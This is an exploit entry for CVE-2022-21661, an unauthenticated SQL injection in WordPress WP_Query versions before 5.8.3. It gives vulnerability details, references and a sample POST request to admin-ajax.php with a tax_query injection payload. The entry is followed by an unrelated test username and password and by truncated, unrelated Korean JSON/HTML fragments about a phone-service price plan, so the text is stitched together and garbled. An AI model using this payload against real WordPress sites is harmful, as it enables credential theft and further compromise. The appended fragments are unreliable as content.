# Exploit Title: WordPress Core 5.8.2 - 'WP_Query' SQL Injection
# Date: 11/01/2022
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/download/releases
# Version: < 5.8.3
# Tested on: Windows 10
# CVE : CVE-2022-21661

# [ VULNERABILITY DETAILS ] : 

#This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core,
#Authentication is not required to exploit this vulnerability, The specific flaw exists within the WP_Query class,
#The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries,
#An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.

# [ References ] : 

https://wordpress.org/news/category/releases
https://www.zerodayinitiative.com/advisories/ZDI-22-020
https://hackerone.com/reports/1378209

# [ Sample Request ] :

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Upgrade-Insecure_Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Connection: close 
Content-Type: application/x-www-form-urlencoded

action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}

#test
username = "20230317"
password = 123456

...사은품","mgCat":"금융/경제/ 사업,웹아이콘,패션/스타일","subje... 

...m: uppercase;\">요금제 스펙</span></p>","textAl... 

...othic;\">로 편리하게 전화를 관리</span></p>","textAl... 

...\">(월 30분 무료통화로 충분한 사장님)</span></div>"}]]}... 

... 시</span><br>(3년 약정 기준)</div>"},{"rs":2,"f... 

...":1},"htm":"<div>기본 정책<br><span style=\"fo... 

...지침 개인사업자/정식단체/법인/관천 계약변경 I-2<br>&nbsp; (3)... 

...>&nbsp;AI전화 요금제는 매장 운영에 필요한 기능을 다 제공 해드려요. (AI인사말/ 착신전환)&nbsp;... style=\"color: rgb(255, 151, 80);\">유명 브랜드 언급</span>) bbq매장은, 인사말에 쿠폰은 배민 어플을 통해 사용해... 

...\"rgb(68, 68, 68)\"> 주요 타겟</tspan></tspan>"... 

... 착신전환서비스는, 꼭 매장 전화기 단말을 통해서만 모바일 착신전환 설정/해... 

...iv>순서: [APP다운로드] → [ 비밀번호 설정] → [로그인]<br><b... 

...":1},"htm":"<div>Q. 장애인 할인 및 복지 감면 등 다른 할인... 

